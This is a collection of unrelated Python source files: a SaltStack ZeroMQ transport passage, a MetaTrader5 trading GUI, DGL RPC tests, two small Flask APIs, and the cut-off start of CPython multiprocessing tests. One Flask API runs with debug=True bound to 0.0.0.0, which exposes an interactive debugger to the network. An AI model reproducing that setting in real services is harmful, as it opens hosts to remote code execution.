self.pub_sock.connect(pull_uri)
return self._sock_data.sock
def pub_close(self):
"""
Disconnect an existing publisher socket and remove it from the local
thread's cache.
"""
if hasattr(self._sock_data, "sock"):
self._sock_data.sock.close()
delattr(self._sock_data, "sock")
def publish(self, load):
"""
Publish "load" to minions. This send the load to the publisher daemon
process with does the actual sending to minions.
:param dict load: A load to be sent across the wire to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list":
int_payload["topic_lst"] = load["tgt"]
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts["zmq_filtering"] and load["tgt_type"] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load["tgt"], tgt_type=load["tgt_type"])
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload["topic_lst"] = match_ids
payload = self.serial.dumps(int_payload)
log.debug(
"Sending payload to publish daemon. jid=%s size=%d",
load.get("jid", None),
len(payload),
)
if not self.pub_sock:
self.pub_connect()
self.pub_sock.send(payload)
log.debug("Sent payload to publish daemon.")
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
"""
Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket.
"""
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(
AsyncReqMessageClient, opts, args=args, kwargs=kwargs
)
self._closing = False
def close(self):
if self._closing:
return
self._closing = True
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def destroy(self):
# Bacwards compat
salt.utils.versions.warn_until(
"Sodium",
"Calling {0}.destroy() is deprecated. Please call {0}.close() instead.".format(
self.__class__.__name__
),
stacklevel=3,
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
# TODO: unit tests!
class AsyncReqMessageClient(object):
"""
This class wraps the underlying zeromq REQ socket and gives a future-based
interface to sending and recieving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
"""
def __init__(self, opts, addr, linger=0, io_loop=None):
"""
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
"""
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
self._closing = False
# TODO: timeout all in-flight sessions, or error
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, "stream") and self.stream is not None:
if ZMQ_VERSION_INFO < (14, 3, 0):
# stream.close() doesn't work properly on pyzmq < 14.3.0
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
else:
self.stream.close()
self.socket = None
self.stream = None
if self.context.closed is False:
self.context.term()
def destroy(self):
# Bacwards compat
salt.utils.versions.warn_until(
"Sodium",
"Calling {0}.destroy() is deprecated. Please call {0}.close() instead.".format(
self.__class__.__name__
),
stacklevel=3,
)
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _init_socket(self):
if hasattr(self, "stream"):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, "RECONNECT_IVL_MAX"):
self.socket.setsockopt(zmq.RECONNECT_IVL_MAX, 5000)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith("tcp://["):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, "IPV6"):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, "IPV4ONLY"):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
log.debug("Trying to connect to: %s", self.addr)
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(
self.socket, io_loop=self.io_loop
)
@salt.ext.tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timedout
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except Exception as err: # pylint: disable=broad-except
log.debug("Re-init ZMQ socket: %s", err)
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't been already timedout
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
"""
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
"""
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug(
"SaltReqTimeoutError, retrying. (%s/%s)",
future.attempts,
future.tries,
)
self.send(
message, timeout=future.timeout, tries=future.tries, future=future,
)
else:
future.set_exception(SaltReqTimeoutError("Message timed out"))
def send(
self, message, timeout=None, tries=3, future=None, callback=None, raw=False
):
"""
Return a future which will be completed when the message has a response
"""
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message
)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
"""
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
"""
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(
self._monitor_socket, io_loop=io_loop
)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith("EVENT_"):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt["description"] = self.event_map[evt["event"]]
log.debug("ZeroMQ event: %s", evt)
if evt["event"] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
impl.py
|
import datetime
import locale
from multiprocessing import *
import os
from threading import *
from time import sleep
import MetaTrader5 as mt5
import toml
import wx.stc
import ui
import impl_config
import order
import status
from enums import *
class FrameMainImpl(ui.FrameMain):
def __init__(self, *args, **kwds):
super().__init__(*args, **kwds)
self.VERSION = '1.4.2'
self.q_ctrl = None # Queue: Interprocess communication for control.
self.q_tick = None # Queue: Interprocess communication for ticks.
self.account_currency = None # str
self.account_currency_digits = None # int
self.account_number = None # int
self.symbols = None # list of str: All available symbol names.
self.symbol = None # str: A symbol that you are trading.
self.symbol_info = None # SymbolInfo: Information of a symbol that you are trading.
self.can_close_by = None # bool: True: Can close a position by another one.
self.bid = None # float
self.ask = None # float
self.spread = None # int
self.selected = False # bool: If True, it prevents invoking on_symbol_input().
# MetaTrader5
self.SetStatusText(f'Scadama {self.VERSION}, MetaTrader5 package {mt5.__version__}')
# Load configuration.
if not os.path.exists('config.toml'):
init_config_toml()
config = toml.load('config.toml')
# Setup queues.
self.q_ctrl = Queue() # Interprocess Communication for controlling a process.
self.q_tick = Queue() # Interprocess Communication for ticks.
# Main Window Size
size = config['size']
if size['x'] != 0:
self.SetSize(wx.Size(size['x'], size['y']))
# choice_client
client = config['client']
self.choice_client.Set(client)
self.choice_client.SetSelection(0)
# Initialize a symbol.
quick_symbols = config['symbol']
self.symbol = quick_symbols[0]
self.symbols = []
def on_config(self, event):
impl_config.FrameConfigImpl(wx.GetTopLevelParent(self), wx.ID_ANY)
def on_connection(self, event):
if self.togglebutton_connect.GetValue(): # Pressed
connect(self)
else: # Pulled
disconnect(self)
def on_symbol_selection(self, event):
symbol = self.combobox_symbol.GetStringSelection()
change_symbol(self, symbol)
self.selected = True
def on_symbol_input(self, event):
if self.selected:
self.selected = False
return
symbol = self.combobox_symbol.GetValue()
if symbol in self.symbols:
change_symbol(self, symbol)
self.combobox_symbol.SetStringSelection(self.symbol)
def on_bid_order(self, event):
lot = self.spinctrldouble_lot.GetValue()
slip = self.spinctrl_slippage.GetValue()
sl = self.spinctrl_sl.GetValue()
tp = self.spinctrl_tp.GetValue()
result = order.send_order('sell', self.symbol, event.price, lot, slip, sl, tp)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
# I can not get a new position right after an order.
#status.update_average(self)
def on_ask_order(self, event):
lot = self.spinctrldouble_lot.GetValue()
slip = self.spinctrl_slippage.GetValue()
sl = self.spinctrl_sl.GetValue()
tp = self.spinctrl_tp.GetValue()
result = order.send_order('buy', self.symbol, event.price, lot, slip, sl, tp)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
# I can not get a new position right after an order.
#status.update_average(self)
# Save values of spins.
# This is also a workaround
# because wx's spins (only int? float?) value which you see is not the value which you get.
# But after you click somewhere else except the spin which you changed,
# a value which you see is the value which you get.
def on_setting_spin(self, event):
symbol = self.symbol
sp_lim = self.spinctrl_spread.GetValue()
lot = self.spinctrldouble_lot.GetValue()
slip = self.spinctrl_slippage.GetValue()
sl = self.spinctrl_sl.GetValue()
tp = self.spinctrl_tp.GetValue()
if os.path.exists('spin.toml'):
spin_toml = toml.load('spin.toml')
else:
spin_toml = {}
spin_toml[symbol] = {'sp_lim': sp_lim, 'lot': lot, 'slip': slip, 'sl': sl, 'tp': tp}
with open('spin.toml', 'w') as f:
toml.dump(spin_toml, f)
status.update_commission(self)
status.update_swap(self)
status.update_margin(self)
def on_closing_bid(self, event):
if self.can_close_by:
order.close_bid_with_closing_by()
self.SetStatusText('Not implemented.')
else:
result = order.close_bid(self.symbol)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
def on_closing_all(self, event):
if self.can_close_by:
order.close_all_with_closing_by()
self.SetStatusText('Not implemented.')
else:
result = order.close_all()
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
def on_closing(self, event):
if self.can_close_by:
order.close_with_closing_by()
self.SetStatusText('Not implemented.')
else:
result = order.close(self.symbol)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
def on_closing_ask(self, event):
if self.can_close_by:
order.close_ask_with_closing_by()
self.SetStatusText('Not implemented.')
else:
result = order.close_ask(self.symbol)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
def on_closing_by(self, event):
order.close_by(self.symbol)
def on_close(self, event):
self.q_ctrl.put('disconnect') # Child Process Disconnection
mt5.shutdown()
self.Destroy()
def connect(it):
client = it.choice_client.GetStringSelection()
if mt5.initialize(client): # Success
it.choice_client.Disable()
it.togglebutton_connect.SetLabel('Disconnect')
print('Connected to', client)
it.SetStatusText('Connected to ' + client)
print('MetaTrader 5 version:', mt5.version())
terminal_info = mt5.terminal_info()
if not terminal_info.trade_allowed:
it.SetStatusText('Trading is not allowed. (Tools -> Options -> Expert Advisors).')
account_info = mt5.account_info()
if ENUM_ACCOUNT_TRADE_MODE(account_info.trade_mode) \
== ENUM_ACCOUNT_TRADE_MODE.ACCOUNT_TRADE_MODE_DEMO:
it.SetTitle('Scadama [DEMO]')
elif ENUM_ACCOUNT_TRADE_MODE(account_info.trade_mode) \
== ENUM_ACCOUNT_TRADE_MODE.ACCOUNT_TRADE_MODE_CONTEST:
it.SetTitle('Scadama [CONTEST]')
else:
it.SetTitle('Scadama')
it.account_number = account_info.login
it.account_currency = account_info.currency
it.account_currency_digits = account_info.currency_digits
# combobox_symbol and initializing symbol
symbols_info = mt5.symbols_get()
symbols = []
for x in symbols_info:
symbols.append(x.name)
it.symbols = symbols
it.combobox_symbol.Set(it.symbols)
if it.symbol in it.symbols:
it.combobox_symbol.SetStringSelection(it.symbol)
else:
it.combobox_symbol.SetSelection(0)
it.symbol = it.combobox_symbol.GetStringSelection()
it.symbol_info = mt5.symbol_info(it.symbol)
if not it.symbol_info.select:
mt5.symbol_select(it.symbol, True)
it.spinctrldouble_lot.SetMax(it.symbol_info.volume_max)
set_spin(it, it.symbol)
set_slippage_availability(it)
set_close_by_availability(it)
# A thread to receive a tick.
thread = Thread(target = recv_tick, args = (it, ))
thread.start()
# A process to send a tick.
process = Process(target = send_tick, args = (it.q_ctrl, it.q_tick))
process.start()
it.q_ctrl.put(it.choice_client.GetStringSelection())
it.q_ctrl.put(it.symbol)
else: # Failure
it.togglebutton_connect.SetValue(False)
print('Failed to connect to', client)
print(last_error())
def disconnect(it):
client = it.choice_client.GetStringSelection()
it.q_ctrl.put('disconnect') # Child Process Disconnection
mt5.shutdown()
print('Disconnected from', client)
it.SetStatusText('Disconnected from ' + client)
it.choice_client.Enable()
it.combobox_symbol.Clear()
it.togglebutton_connect.SetLabel('Connect')
def recv_tick(it): # Runs in a thread.
locale.setlocale(locale.LC_TIME, 'en_US.UTF-8')
while True:
# Get a tick.
tick = it.q_tick.get() # e.g. {'time': 1616153185, 'bid': 1.19124, 'ask': 1.19127,
# 'last': 0.0, 'volume': 0, 'time_msc': 1616153185151, 'flags': 4,
# 'volume_real': 0.0, 'symbol': 'EURUSD', 'error': ''}
# Show the server's local time.
time = tick['time']
# This does not mean it is UTC but server's local time.
time_zone = datetime.timezone(datetime.timedelta(hours = 0))
time = datetime.datetime.fromtimestamp(time, time_zone)
time_str = f'{time:%Y.%m.%d %a %H:%M:%S}' # f-string
it.statictext_time.SetLabel(time_str)
# Show bid, ask and spread.
it.bid = tick['bid']
it.orderbutton_bid.update_price(it.bid, it.symbol_info.digits)
it.ask = tick['ask']
it.orderbutton_ask.update_price(it.ask, it.symbol_info.digits)
it.spread = round((it.ask - it.bid) * (10.0 ** it.symbol_info.digits))
it.statictext_spread.SetLabel(f'{it.spread}')
if tick['error'] != '':
it.SetStatusText(f'Error: {tick["error"]}')
# Show averages.
status.update_average(it)
def send_tick(q_ctrl, q_tick): # Runs in a child process.
client = q_ctrl.get()
if mt5.initialize(client): # Success
symbol = q_ctrl.get()
last_tick = None
while True:
if not q_ctrl.empty():
ctrl = q_ctrl.get()
if ctrl == 'disconnect':
mt5.shutdown()
return
else:
symbol = ctrl
tick = mt5.symbol_info_tick(symbol) # Non-blocking
if tick != None:
if tick != last_tick:
last_tick = tick
tick_d = tick._asdict()
tick_d['symbol'] = symbol
tick_d['error'] = ''
q_tick.put(tick_d)
else:
# Double parens by structseq()
# time bid ask last volume time_msc flags volume_real
tick = mt5.Tick(( 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0))
if tick != last_tick:
last_tick = tick
tick_d = tick._asdict()
tick_d['symbol'] = symbol
tick_d['error'] = 'Getting a symbol info tick failed.'
q_tick.put(tick_d)
sleep(0.001)
def init_config_toml():
with open('config.toml', mode='w') as f:
f.write('''\
# Paths to your MetaTrader 5 clients.
client = [
'C:\local\mt5\mq\\terminal64.exe',
'C:\local\mt5\\tt\\terminal64.exe',
'C:\your\mt5\\terminal64.exe',
]
# Symbols for quick buttons.
symbol = [
'EURUSD',
'USDJPY',
]
# Main Window Size
# If the x value is 0, the window size will be decided automatically.
# [Windows] If you get the window scale setting 200%,
# the window size will be twice as large as this settings.
[size]
x = 0
y = 0
''')
def set_slippage_availability(it):
if ENUM_SYMBOL_TRADE_EXECUTION(it.symbol_info.trade_exemode) \
== ENUM_SYMBOL_TRADE_EXECUTION.SYMBOL_TRADE_EXECUTION_REQUEST \
or ENUM_SYMBOL_TRADE_EXECUTION(it.symbol_info.trade_exemode) \
== ENUM_SYMBOL_TRADE_EXECUTION.SYMBOL_TRADE_EXECUTION_INSTANT:
it.spinctrl_slippage.Enable()
else:
it.spinctrl_slippage.Disable()
def set_close_by_availability(it):
if SYMBOL_ORDER_MODE(it.symbol_info.order_mode) & SYMBOL_ORDER_MODE.SYMBOL_ORDER_CLOSEBY \
!= SYMBOL_ORDER_MODE(0):
it.can_close_by = True
it.button_close_by.Enable()
else:
it.can_close_by = False
it.button_close_by.Disable()
def change_symbol(it, symbol):
it.symbol = symbol
symbol_info = it.symbol_info = mt5.symbol_info(symbol)
if not symbol_info.select:
mt5.symbol_select(symbol, True)
it.spinctrldouble_lot.SetMax(symbol_info.volume_max)
set_spin(it, symbol)
set_slippage_availability(it)
set_close_by_availability(it)
it.q_ctrl.put(it.symbol)
def set_spin(it, symbol): # Set values of spins.
if os.path.exists('spin.toml'):
spin_toml = toml.load('spin.toml')
else:
spin_toml = {}
if symbol in spin_toml:
spin_data = spin_toml[symbol]
it.spinctrl_spread.SetValue(spin_data['sp_lim'])
it.spinctrldouble_lot.SetValue(spin_data['lot'])
it.spinctrl_slippage.SetValue(spin_data['slip'])
it.spinctrl_sl.SetValue(spin_data['sl'])
it.spinctrl_tp.SetValue(spin_data['tp'])
else:
it.spinctrl_spread.SetValue(0)
it.spinctrldouble_lot.SetValue(0.0)
it.spinctrl_slippage.SetValue(0)
it.spinctrl_sl.SetValue(0)
it.spinctrl_tp.SetValue(0)
status.update_commission(it)
status.update_swap(it)
status.update_margin(it)
|
test_rpc.py
|
import os
import time
import socket
import dgl
import backend as F
import unittest, pytest
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
INTEGER = 2
STR = 'hello world!'
HELLO_SERVICE_ID = 901231
TENSOR = F.zeros((10, 10), F.int64, F.cpu())
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
def foo(x, y):
assert x == 123
assert y == "abc"
class MyRequest(dgl.distributed.Request):
def __init__(self):
self.x = 123
self.y = "abc"
self.z = F.randn((3, 4))
self.foo = foo
def __getstate__(self):
return self.x, self.y, self.z, self.foo
def __setstate__(self, state):
self.x, self.y, self.z, self.foo = state
def process_request(self, server_state):
pass
class MyResponse(dgl.distributed.Response):
def __init__(self):
self.x = 432
def __getstate__(self):
return self.x
def __setstate__(self, state):
self.x = state
def simple_func(tensor):
return tensor
class HelloResponse(dgl.distributed.Response):
def __init__(self, hello_str, integer, tensor):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
def __getstate__(self):
return self.hello_str, self.integer, self.tensor
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor = state
class HelloRequest(dgl.distributed.Request):
def __init__(self, hello_str, integer, tensor, func):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
self.func = func
def __getstate__(self):
return self.hello_str, self.integer, self.tensor, self.func
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor, self.func = state
def process_request(self, server_state):
assert self.hello_str == STR
assert self.integer == INTEGER
new_tensor = self.func(self.tensor)
res = HelloResponse(self.hello_str, self.integer, new_tensor)
return res
def start_server(num_clients, ip_config):
print("Sleep 5 seconds to test client re-connect.")
time.sleep(5)
server_state = dgl.distributed.ServerState(None, local_g=None, partition_book=None)
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.start_server(server_id=0,
ip_config=ip_config,
num_servers=1,
num_clients=num_clients,
server_state=server_state)
def start_client(ip_config):
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.connect_to_server(ip_config=ip_config, num_servers=1)
req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
# test send and recv
dgl.distributed.send_request(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test send_request_to_machine
dgl.distributed.send_request_to_machine(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call_to_machine
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call_to_machine(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
def test_serialize():
os.environ['DGL_DIST_MODE'] = 'distributed'
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload
SERVICE_ID = 12345
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
req1 = deserialize_from_payload(MyRequest, data, tensors)
req1.foo(req1.x, req1.y)
assert req.x == req1.x
assert req.y == req1.y
assert F.array_equal(req.z, req1.z)
res = MyResponse()
data, tensors = serialize_to_payload(res)
res1 = deserialize_from_payload(MyResponse, data, tensors)
assert res.x == res1.x
def test_rpc_msg():
os.environ['DGL_DIST_MODE'] = 'distributed'
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage
SERVICE_ID = 32452
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors)
assert rpcmsg.service_id == SERVICE_ID
assert rpcmsg.msg_seq == 23
assert rpcmsg.client_id == 0
assert rpcmsg.server_id == 1
assert len(rpcmsg.data) == len(data)
assert len(rpcmsg.tensors) == 1
assert F.array_equal(rpcmsg.tensors[0], req.z)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_rpc():
os.environ['DGL_DIST_MODE'] = 'distributed'
ip_config = open("rpc_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(1, "rpc_ip_config.txt"))
pclient = ctx.Process(target=start_client, args=("rpc_ip_config.txt",))
pserver.start()
time.sleep(1)
pclient.start()
pserver.join()
pclient.join()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_multi_client():
os.environ['DGL_DIST_MODE'] = 'distributed'
ip_config = open("rpc_ip_config_mul_client.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(10, "rpc_ip_config_mul_client.txt"))
pclient_list = []
for i in range(10):
pclient = ctx.Process(target=start_client, args=("rpc_ip_config_mul_client.txt",))
pclient_list.append(pclient)
pserver.start()
for i in range(10):
pclient_list[i].start()
for i in range(10):
pclient_list[i].join()
pserver.join()
if __name__ == '__main__':
test_serialize()
test_rpc_msg()
test_rpc()
test_multi_client()
|
main.py
|
from flask import Flask, request
import threading
from .grading import gradingProcess
from .queryComparison import dataGen
app = Flask(__name__)
@app.route("/")
def index():
return "SQLGrader API"
# route for running the grading process by grading_process_id
@app.route("/grading/<int:grading_process_id>", methods=["POST"])
def grading(grading_process_id):
data = request.get_json()
apikey = request.headers.get("apikey")
# do the grading stuff
grading_thread = threading.Thread(target=gradingProcess.rungradingprocess, kwargs={"grading_process_id": grading_process_id, "apikey": apikey, "post_body": data})
grading_thread.start()
return "Grading process started", 200
# route for query data generation
@app.route("/datagen/<int:environment_instance_id>", methods=["POST"])
def datagen(environment_instance_id):
data = request.get_json()
apikey = request.headers.get("apikey")
# do datagen
datagen_thread = threading.Thread(target=dataGen.startdatagen, kwargs={"environment_instance_id": environment_instance_id, "apikey": apikey, "post_body": data})
datagen_thread.start()
return "Data gen started", 200
|
api.py
|
#!/usr/bin/env python3
from threading import Thread
from flask import Flask, request
from flask_restplus import Resource, Api, fields
from parser import parse_instructions
from io import open
from os.path import isfile
app = Flask(__name__)
api = Api(app)
program = api.model('program', {
'instructions': fields.List(fields.String, required=True, description='Instructions', example=["mov 50 200", "rot 100 90"])
})
@api.route('/echo')
class Echo(Resource):
def get(self):
return {'response': 'echo'}
@api.route('/runprogram')
class RunProgram(Resource):
@api.doc("Run a program given an instruction set")
@api.expect(program)
@api.response(400, 'Malformed request')
@api.response(409, 'Another program is already running')
@api.response(200, 'Program transfer complete')
def post(self):
if isfile('lock'):
return {'response': 'error', 'message': 'Another program is already running'}, 409
print(request.json)
if not request.json or not "instructions" in request.json:
return {'response': 'error', 'message': 'No instructions provided'}, 400
open('lock', 'w').close()
instructions = request.json["instructions"]
Thread(target = parse_instructions, args = (instructions, 1, )).start()
return {'response': 'success'}, 200
@api.route('/terminate')
class Terminate(Resource):
@api.doc("Terminate the currently running program")
@api.response(400, "No program is currently running or termination is in progress")
@api.response(200, "Program termination request success")
def get(self):
if isfile('terminate'):
return {'response': 'error', 'message': 'Termination in progress'}, 400
if not isfile('lock'):
return {'response': 'error', 'message': 'No program is currently running'}, 400
open('terminate', 'w').close()
return {'response': 'success'}, 200
@api.route('/busy')
class Busy(Resource):
@api.doc("Check if a program is currently running")
@api.response(200, 'Status information')
def get(self):
return {'response': 'success', 'status': isfile('lock')}, 200
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=True)
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 60.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
